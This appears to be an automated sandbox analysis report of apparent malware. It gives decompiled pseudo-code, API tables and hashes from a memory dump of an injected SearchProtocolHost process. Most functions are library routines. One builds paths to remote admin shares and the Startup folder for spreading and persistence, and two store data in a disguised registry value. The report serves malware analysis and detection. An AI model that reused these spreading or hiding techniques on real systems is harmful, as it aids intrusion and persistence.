                                                0x02fba4c7
                                                0x02fba4c9
                                                0x00000000
                                                0x00000000
                                                0x02fba4cf
                                                0x02fba4d5
                                                0x02fba4d5
                                                0x00000000
                                                0x02fba4d5
                                                0x02fba49d
                                                0x02fba4a1
                                                0x02fba4a6
                                                0x02fba4aa
                                                0x00000000
                                                0x00000000
                                                0x02fba4b0
                                                0x00000000
                                                0x02fba4b0

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,77109EB0,?,?,?,?,?,02FBA660,00000001,00000001,?), ref: 02FBA469
                                                • __alloca_probe_16.LIBCMT ref: 02FBA4A1
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,02FBA660,00000001,00000001,?,02FD0E80,?,?), ref: 02FBA4EF
                                                • __alloca_probe_16.LIBCMT ref: 02FBA586
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,02FD0E80,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02FBA5E9
                                                • __freea.LIBCMT ref: 02FBA5F6
                                                  • Part of subcall function 02FB7882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB78B4
                                                • __freea.LIBCMT ref: 02FBA5FF
                                                • __freea.LIBCMT ref: 02FBA624
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 3864826663-0
                                                • Opcode ID: 095f8e1dbf311c14c108df507a543fe88cfaaa11ec79992c0e2f5d14eb0dd728
                                                • Instruction ID: 056453c494bf870544d49c0361b1a4546c5093122cd40b309aba09e6d1228122
                                                • Opcode Fuzzy Hash: 095f8e1dbf311c14c108df507a543fe88cfaaa11ec79992c0e2f5d14eb0dd728
                                                • Instruction Fuzzy Hash: AC51CE72A00216AFDB269E76CD44EEF77AAEF44794F144628FE04D6250EB35DD80CA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FBD142 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E02FBD142(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t134;
				signed int _t135;
				void* _t136;

				_t78 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t78 ^ _t135;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_t9 = _t116 + 0x18; // 0xcccccccc
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x2fd6480 + _t118 * 4)) + _t9));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t134 = _a4;
				_v60 = _t86;
				 *_t134 = 0;
				 *((intOrPtr*)(_t134 + 4)) = 0;
				 *((intOrPtr*)(_t134 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x2fd6480 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E02FBC178(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x2fd6480 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x2fd6480 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x2fd6480 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
							} else {
								_t112 = E02FB8950( &_v28, _t133, 2);
								_t136 = _t136 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E02FB8950();
						_t136 = _t136 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t134 = GetLastError();
								} else {
									 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t134 + 8)) =  *((intOrPtr*)(_t134 + 8)) + 1;
													 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E02FB0A5D(_v8 ^ _t135, _t134);
			}



































                                                0x02fbd14a
                                                0x02fbd151
                                                0x02fbd154
                                                0x02fbd15c
                                                0x02fbd160
                                                0x02fbd16c
                                                0x02fbd16f
                                                0x02fbd172
                                                0x02fbd175
                                                0x02fbd179
                                                0x02fbd181
                                                0x02fbd184
                                                0x02fbd18a
                                                0x02fbd190
                                                0x02fbd195
                                                0x02fbd197
                                                0x02fbd19a
                                                0x02fbd19f
                                                0x02fbd1a9
                                                0x02fbd1b0
                                                0x02fbd1b3
                                                0x02fbd1ba
                                                0x02fbd1c1
                                                0x02fbd1ed
                                                0x02fbd213
                                                0x02fbd215
                                                0x00000000
                                                0x02fbd1ef
                                                0x02fbd1f2
                                                0x02fbd2b9
                                                0x02fbd2c5
                                                0x02fbd2d0
                                                0x02fbd2d5
                                                0x02fbd1f8
                                                0x02fbd1ff
                                                0x02fbd204
                                                0x02fbd20a
                                                0x02fbd210
                                                0x00000000
                                                0x02fbd210
                                                0x02fbd20a
                                                0x02fbd1f2
                                                0x02fbd1c3
                                                0x02fbd1c7
                                                0x02fbd1ca
                                                0x02fbd1d0
                                                0x02fbd1d2
                                                0x02fbd1d5
                                                0x02fbd1d9
                                                0x02fbd216
                                                0x02fbd219
                                                0x02fbd21a
                                                0x02fbd21f
                                                0x02fbd225
                                                0x02fbd22b
                                                0x02fbd23a
                                                0x02fbd240
                                                0x02fbd246
                                                0x02fbd24b
                                                0x02fbd267
                                                0x02fbd2da
                                                0x02fbd2e0
                                                0x02fbd269
                                                0x02fbd271
                                                0x02fbd27a
                                                0x02fbd280
                                                0x00000000
                                                0x02fbd282
                                                0x02fbd284
                                                0x02fbd287
                                                0x02fbd2a0
                                                0x00000000
                                                0x02fbd2a2
                                                0x02fbd2a6
                                                0x02fbd2a8
                                                0x02fbd2ab
                                                0x00000000
                                                0x02fbd2ab
                                                0x02fbd2a6
                                                0x02fbd2a0
                                                0x02fbd280
                                                0x02fbd27a
                                                0x02fbd267
                                                0x02fbd24b
                                                0x02fbd225
                                                0x00000000
                                                0x02fbd2ae
                                                0x02fbd2ae
                                                0x02fbd2e2
                                                0x02fbd2f4

                                                APIs
                                                • GetConsoleCP.KERNEL32(00000010,02FA971E,08A10000,?,?,?,?,?,?,02FBD8B7,00000000,02FA971E,00000010,02FA971E,02FA971E,?), ref: 02FBD184
                                                • __fassign.LIBCMT ref: 02FBD1FF
                                                • __fassign.LIBCMT ref: 02FBD21A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,02FA971E,00000001,00000010,00000005,00000000,00000000), ref: 02FBD240
                                                • WriteFile.KERNEL32(?,00000010,00000000,02FBD8B7,00000000,?,?,?,?,?,?,?,?,?,02FBD8B7,00000000), ref: 02FBD25F
                                                • WriteFile.KERNEL32(?,00000000,00000001,02FBD8B7,00000000,?,?,?,?,?,?,?,?,?,02FBD8B7,00000000), ref: 02FBD298
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: f5a10f1b4c131538e923d6ce5d385e21194c9bdbcdd4272640001ab36a2c21ed
                                                • Instruction ID: 5460e5647e5962ba55bee1e9c139396f255748b866fceae62cc44ce335d2f08c
                                                • Opcode Fuzzy Hash: f5a10f1b4c131538e923d6ce5d385e21194c9bdbcdd4272640001ab36a2c21ed
                                                • Instruction Fuzzy Hash: 2A51D071E002499FDB11CFA9D885AEEBBF9FF09340F24451AEA52E7241D730E941CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA8A40 Relevance: 10.6, APIs: 7, Instructions: 119COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E02FA8A40(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
				long _v8;
				char _v16;
				char _v20;
				struct _CRITICAL_SECTION _v44;
				long _v48;
				long _v52;
				void* _v56;
				char _v60;
				signed int _t45;
				char _t53;
				void* _t60;
				void* _t84;
				void* _t96;
				void* _t100;
				signed int _t102;

				_push(0xffffffff);
				_push(E02FC46F8);
				_push( *[fs:0x0]);
				_t45 =  *0x2fcf008; // 0x93ad1eea
				_push(_t45 ^ _t102);
				 *[fs:0x0] =  &_v16;
				_t96 = __ecx;
				_v60 = 0x2fccab8;
				_v48 = 0;
				_v56 = 0;
				_v52 = 0;
				InitializeCriticalSection( &_v44);
				_v8 = 0;
				EnterCriticalSection( &_v44);
				_v52 = _v56;
				E02FA8840( &_v60, 0x400);
				LeaveCriticalSection( &_v44);
				_t53 = _a8;
				if(_t53 == 0 || _a4 == 0) {
					EnterCriticalSection( &_v44);
					_t28 = ( ==  ? 0 : _v52 - _v56) + 5; // 0x5
					if(E02FA87B0( &_v60, _t28) != 0xffffffff) {
						_t31 = _t96 + 0x214; // 0x2a0073
						 *_v52 =  *_t31;
						_t33 = _t96 + 0x218; // 0x0
						 *((char*)(_v52 + 4)) =  *_t33;
						_v52 = _v52 + 5;
					}
					LeaveCriticalSection( &_v44);
				} else {
					_v20 = _t53 + 0xd;
					_t17 = _t96 + 0x214; // 0x2fccccc
					E02FA8690( &_v60, _t17, 5);
					E02FA8690( &_v60,  &_v20, 4);
					E02FA8690( &_v60,  &_a8, 4);
					E02FA8690( &_v60, _a4, _a8);
				}
				_t82 =  ==  ? 0 : _v52 - _v56;
				_push( ==  ? 0 : _v52 - _v56);
				_t60 = E02FA89D0(_t96, _v56,  ==  ? 0 : _v52 - _v56);
				_t84 = _v56;
				_t100 = _t60;
				_v60 = 0x2fccab8;
				if(_t84 != 0) {
					VirtualFree(_t84, 0, 0x8000);
				}
				DeleteCriticalSection( &_v44);
				 *[fs:0x0] = _v16;
				return _t100;
			}


















                                                0x02fa8a43
                                                0x02fa8a45
                                                0x02fa8a50
                                                0x02fa8a56
                                                0x02fa8a5d
                                                0x02fa8a61
                                                0x02fa8a67
                                                0x02fa8a6c
                                                0x02fa8a74
                                                0x02fa8a7b
                                                0x02fa8a82
                                                0x02fa8a89
                                                0x02fa8a92
                                                0x02fa8a9a
                                                0x02fa8aab
                                                0x02fa8aae
                                                0x02fa8abd
                                                0x02fa8abf
                                                0x02fa8ac4
                                                0x02fa8b13
                                                0x02fa8b28
                                                0x02fa8b37
                                                0x02fa8b3c
                                                0x02fa8b42
                                                0x02fa8b47
                                                0x02fa8b4d
                                                0x02fa8b50
                                                0x02fa8b50
                                                0x02fa8b58
                                                0x02fa8acc
                                                0x02fa8ad2
                                                0x02fa8ad5
                                                0x02fa8ade
                                                0x02fa8aec
                                                0x02fa8afa
                                                0x02fa8b08
                                                0x02fa8b08
                                                0x02fa8b66
                                                0x02fa8b69
                                                0x02fa8b6e
                                                0x02fa8b73
                                                0x02fa8b76
                                                0x02fa8b78
                                                0x02fa8b81
                                                0x02fa8b8b
                                                0x02fa8b8b
                                                0x02fa8b95
                                                0x02fa8ba0
                                                0x02fa8bad

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA8A89
                                                • EnterCriticalSection.KERNEL32(?), ref: 02FA8A9A
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 02FA8ABD
                                                • EnterCriticalSection.KERNEL32(?), ref: 02FA8B13
                                                • LeaveCriticalSection.KERNEL32(?,00000005), ref: 02FA8B58
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00000000), ref: 02FA8B8B
                                                • DeleteCriticalSection.KERNEL32(?,00000000,00000000,00000000), ref: 02FA8B95
                                                  • Part of subcall function 02FA8690: EnterCriticalSection.KERNEL32(?,?,?,?,?,02FA8C1E,?,02FA7B57,93AD1EEA,73B76490,00000000,?), ref: 02FA869C
                                                  • Part of subcall function 02FA8690: LeaveCriticalSection.KERNEL32(?,?,?,02FA8C1E,?,02FA7B57,93AD1EEA,73B76490,00000000,?), ref: 02FA86C5
                                                  • Part of subcall function 02FA8690: LeaveCriticalSection.KERNEL32(?,73B76490,00000000,?,?,?,?,?,?,?,?,?,02FC4728,000000FF,?,02FA7B57), ref: 02FA86E7
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter$DeleteFreeInitializeVirtual
                                                • String ID:
                                                • API String ID: 2514474324-0
                                                • Opcode ID: c272e2c12bf652c3b7dbcdaf5a97af17e39c38f60ba65d1d63d5d448c1813864
                                                • Instruction ID: 17b95802528478b926cbd7a80afdb79ae48931f9c5704ebcdf7095469f707a52
                                                • Opcode Fuzzy Hash: c272e2c12bf652c3b7dbcdaf5a97af17e39c38f60ba65d1d63d5d448c1813864
                                                • Instruction Fuzzy Hash: 17411BB5E4020DABDB04DFA8D9A8BDEBBB9BF08790F14451AF615E7280DB74A504CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FBC425 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E02FBC425(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t34 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t34 ^ _t69;
				E02FB4970(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E02FB0A5D(_v8 ^ _t69, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x2fd0e88
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E02FB3440(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E02FBA677(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x2fd0e88
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x2fd0e88
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E02FB7882(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E02FC3C70();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}





















                                                0x02fbc42d
                                                0x02fbc434
                                                0x02fbc440
                                                0x02fbc445
                                                0x02fbc44a
                                                0x02fbc44f
                                                0x02fbc452
                                                0x02fbc454
                                                0x02fbc454
                                                0x02fbc459
                                                0x02fbc472
                                                0x02fbc478
                                                0x02fbc47d
                                                0x02fbc51c
                                                0x02fbc520
                                                0x02fbc525
                                                0x02fbc525
                                                0x02fbc541
                                                0x02fbc541
                                                0x02fbc483
                                                0x02fbc486
                                                0x02fbc48b
                                                0x02fbc48f
                                                0x02fbc4db
                                                0x02fbc4dd
                                                0x02fbc4df
                                                0x02fbc4e4
                                                0x02fbc4fb
                                                0x02fbc503
                                                0x02fbc513
                                                0x02fbc513
                                                0x02fbc503
                                                0x02fbc515
                                                0x02fbc516
                                                0x00000000
                                                0x02fbc51b
                                                0x02fbc491
                                                0x02fbc496
                                                0x02fbc498
                                                0x02fbc49a
                                                0x02fbc49a
                                                0x02fbc4a2
                                                0x02fbc4bf
                                                0x02fbc4c9
                                                0x02fbc4ce
                                                0x00000000
                                                0x00000000
                                                0x02fbc4d0
                                                0x02fbc4d6
                                                0x02fbc4d6
                                                0x00000000
                                                0x02fbc4d6
                                                0x02fbc4a6
                                                0x02fbc4aa
                                                0x02fbc4af
                                                0x02fbc4b3
                                                0x00000000
                                                0x00000000
                                                0x02fbc4b5
                                                0x00000000

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(123,00000000,?,?,00000000,00000000,?,77109EB0,?,123,00000001,?,?,00000001,?,?), ref: 02FBC472
                                                • __alloca_probe_16.LIBCMT ref: 02FBC4AA
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02FBC4FB
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02FBC50D
                                                • __freea.LIBCMT ref: 02FBC516
                                                  • Part of subcall function 02FB7882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB78B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                • String ID: 123
                                                • API String ID: 313313983-2286445522
                                                • Opcode ID: 163e6b8e079a7f4389f347fce7b0ab9d2114389a77fb7dfe24da1720c0e23f03
                                                • Instruction ID: 968d2841e792adceddb9bd921636cdc339a2da6936017d1fa1cc7453a57cfee4
                                                • Opcode Fuzzy Hash: 163e6b8e079a7f4389f347fce7b0ab9d2114389a77fb7dfe24da1720c0e23f03
                                                • Instruction Fuzzy Hash: A931CD72A0020AAFDB269F66DC44EEF7BA5EF00794B14016AED04D7250EB35DD50CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAAC00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 55%
                                                			E02FAAC00(void* __ebx, char* __ecx, void* __edi, signed int _a8) {
				signed int _v8;
				char _v2052;
				short _v2060;
				char _v2564;
				short _v2572;
				char _v3098;
				void _v3100;
				char _v3340;
				char _v3348;
				char _v3352;
				short _v3356;
				intOrPtr _v3360;
				void* __esi;
				signed int _t22;
				int _t26;
				void* _t30;
				void* _t48;
				char* _t65;
				void* _t66;
				void* _t68;
				signed int _t69;
				signed int _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0xd1c;
				_t22 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t22 ^ _t71;
				_push(__edi);
				_t65 = __ecx;
				E02FB3440(__edi,  &_v3356, 0, 0x100);
				_t60 = MultiByteToWideChar;
				_t72 = _t71 + 0xc;
				_t26 = MultiByteToWideChar(0, 0, _t65, 0xffffffff, 0, 0);
				if(_t26 <= 0x80) {
					MultiByteToWideChar(0, 0, _t65, 0xffffffff,  &_v3356, _t26);
				}
				_t48 = L"c$\\Documents and Settings\\";
				_v3360 = 4;
				do {
					E02FB3440(_t60,  &_v3098, 0, 0x206);
					_t66 = _t48;
					_t30 = memcpy( &_v3100, _t66, 0x40 << 2);
					_t60 = _t66 + 0x80;
					E02FB3440(_t66 + 0x80, _t30, 0, 0x800);
					wsprintfW( &_v2060, L"\\\\%ws\\%ws",  &_v3356,  &_v3100);
					E02FAAA40(_t48,  &_v2052,  &_v3348, _t66 + 0x80);
					_t72 = _t72 + 0x34;
					_t48 = _t48 + 0x100;
					_t14 =  &_v3352;
					 *_t14 = _v3352 - 1;
				} while ( *_t14 != 0);
				E02FB3440(_t60,  &_v2572, 0, 0x208);
				wsprintfW( &_v2572, L"\\\\%ws\\%ws",  &_v3348, L"c$\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup");
				E02FAA760(_t48,  &_v2564,  &_v3340, _t60);
				_pop(_t68);
				return E02FB0A5D(_a8 ^ _t72 + 0x1c, _t68);
			}


























                                                0x02faac06
                                                0x02faac0c
                                                0x02faac13
                                                0x02faac1c
                                                0x02faac26
                                                0x02faac2b
                                                0x02faac30
                                                0x02faac36
                                                0x02faac44
                                                0x02faac4b
                                                0x02faac5a
                                                0x02faac5a
                                                0x02faac5c
                                                0x02faac61
                                                0x02faac70
                                                0x02faac7f
                                                0x02faac9a
                                                0x02faac9c
                                                0x02faac9c
                                                0x02faaca6
                                                0x02faacce
                                                0x02faacde
                                                0x02faace3
                                                0x02faace6
                                                0x02faacec
                                                0x02faacec
                                                0x02faacec
                                                0x02faad06
                                                0x02faad25
                                                0x02faad35
                                                0x02faad44
                                                0x02faad50

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 02FAAC44
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 02FAAC5A
                                                • wsprintfW.USER32 ref: 02FAACCE
                                                • wsprintfW.USER32 ref: 02FAAD25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidewsprintf
                                                • String ID: \\%ws\%ws$c$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
                                                • API String ID: 1452142677-3812071424
                                                • Opcode ID: d81822be72f92068273bf5d7104b0e2d86c75a590ce8c8427126d5bdf9ca99f8
                                                • Instruction ID: 3eb4e92ee6eefba055ac909585cc9218e72715c03b868b24a0393916a5cd58c4
                                                • Opcode Fuzzy Hash: d81822be72f92068273bf5d7104b0e2d86c75a590ce8c8427126d5bdf9ca99f8
                                                • Instruction Fuzzy Hash: DD31D9B19443096BE220DA50DD46FDBB3DCAF44750F10092AB758971C0EA70A5088BD6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA4CE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02FA4CE0(char* _a8, intOrPtr* _a12) {
				int _v8;
				void* _v12;
				int _v16;
				void* __edi;
				int _t22;
				int _t27;
				intOrPtr* _t32;

				_v12 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0;
					_v8 = 0;
					if(RegQueryValueExA(_v12, "History", 0,  &_v16, 0,  &_v8) != 0) {
						goto L1;
					} else {
						_t22 = _v8;
						if(_t22 == 0) {
							goto L1;
						} else {
							_t32 = _a12;
							_t30 =  *_t32;
							if( *_t32 < _t22) {
								L8:
								return 0;
							} else {
								E02FB3440(_t32, _a8, 0, _t30);
								if(RegQueryValueExA(_v12, "History", 0, 0, _a8,  &_v8) != 0) {
									goto L8;
								} else {
									_t27 = _v8;
									if(_t27 == 0) {
										goto L8;
									} else {
										 *_t32 = _t27;
										RegCloseKey(_v12);
										return 1;
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}










                                                0x02fa4ce9
                                                0x02fa4d0a
                                                0x02fa4d15
                                                0x02fa4d22
                                                0x02fa4d3c
                                                0x00000000
                                                0x02fa4d3e
                                                0x02fa4d3e
                                                0x02fa4d43
                                                0x00000000
                                                0x02fa4d45
                                                0x02fa4d46
                                                0x02fa4d49
                                                0x02fa4d4d
                                                0x02fa4d93
                                                0x02fa4d99
                                                0x02fa4d4f
                                                0x02fa4d55
                                                0x02fa4d78
                                                0x00000000
                                                0x02fa4d7a
                                                0x02fa4d7a
                                                0x02fa4d7f
                                                0x00000000
                                                0x02fa4d81
                                                0x02fa4d84
                                                0x02fa4d86
                                                0x02fa4d92
                                                0x02fa4d92
                                                0x02fa4d7f
                                                0x02fa4d78
                                                0x02fa4d4d
                                                0x02fa4d43
                                                0x02fa4d0c
                                                0x02fa4d0c
                                                0x02fa4d11
                                                0x02fa4d11

                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00020019,?), ref: 02FA4D02
                                                • RegQueryValueExA.ADVAPI32(00000000,History,00000000,00000000,00000000,00000800), ref: 02FA4D34
                                                • RegQueryValueExA.ADVAPI32(00000000,History,00000000,00000000,00000000,00000000), ref: 02FA4D70
                                                • RegCloseKey.ADVAPI32(00000000), ref: 02FA4D86
                                                Strings
                                                • History, xrefs: 02FA4D2C, 02FA4D68
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 02FA4CF8
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: History$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1586453840-664128107
                                                • Opcode ID: c63bac5c4d925a07f6af09b72845b5ac74292d8b2c5ef50941696e66b2b356ca
                                                • Instruction ID: 7d92bcf235c629ac1b79ede251f5f666d547320e2dd0dd5ab659db4754ba6c00
                                                • Opcode Fuzzy Hash: c63bac5c4d925a07f6af09b72845b5ac74292d8b2c5ef50941696e66b2b356ca
                                                • Instruction Fuzzy Hash: 1B113074B80209BBEF108E91ED05FADF7B8EF44B54F2000A5AD09E2280D7B1AA159A94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA4C60 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E02FA4C60(char* _a8, int _a12) {
				void* _v8;
				int _v12;
				int _t11;
				long _t13;

				_v8 = 0;
				_v12 = 1;
				_t11 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
				if(_t11 != 0) {
					L3:
					return 0;
				} else {
					_t13 = RegSetValueExA(_v8, "History", _t11, 3, _a8, _a12);
					_push(_v8);
					if(_t13 == 0) {
						RegCloseKey();
						return 1;
					} else {
						RegCloseKey();
						goto L3;
					}
				}
			}







                                                0x02fa4c69
                                                0x02fa4c74
                                                0x02fa4c93
                                                0x02fa4c9b
                                                0x02fa4cc1
                                                0x02fa4cc6
                                                0x02fa4c9d
